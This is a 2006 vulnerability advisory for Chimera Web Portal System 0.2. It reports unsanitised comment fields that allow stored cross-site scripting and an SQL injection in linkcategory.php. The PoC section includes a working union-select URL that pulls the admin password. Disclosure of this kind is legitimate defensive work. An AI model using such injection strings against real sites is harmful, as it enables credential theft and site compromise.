Multiple Vulnerabilities in Chimera Web Portal System

Summary

Vulnerability
Multiple Vulnerabilities in Chimera Web Portal System
Discovered
2006.01.01
Last Update
0 n/a
ID
EV0007
CVE
CVE-2006-0136 CVE-2006-0137
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched
Vendor
Phanatic Softwares (http://www.psoftwares.f2s.com/)
Vulnerable Software
Chimera Web Portal System (http://sourceforge.net/projects/chimera/)
Version
0.2
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in Chimera Web Portal System (http://sourceforge.net/projects/chimera/) script.

XSS

Vulnerable script: modules.php

Variables comment_poster comment_poster_email comment_poster_homepage comment_text isn't sanitized. Users can post messages with any script code.

SQL Injection

Vulnerable script: linkcategory.php

Variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

XSS

Guestbook:
http://host/chimera/modules.php?name=guestbook&file=index

comment_poster=<XSS>

comment_poster_email=<XSS>

comment_poster_homepage=<XSS>

comment_text=<XSS>

SQL Injection

Admin password:
http://host/chimera/linkcategory.php? id=9999'%20union%20select%20admin_password%20from%20admin/*

Solution.

Solution for "Multiple Vulnerabilities in Chimera Web Portal System" is not available. Check Phanatic Softwares website for updates.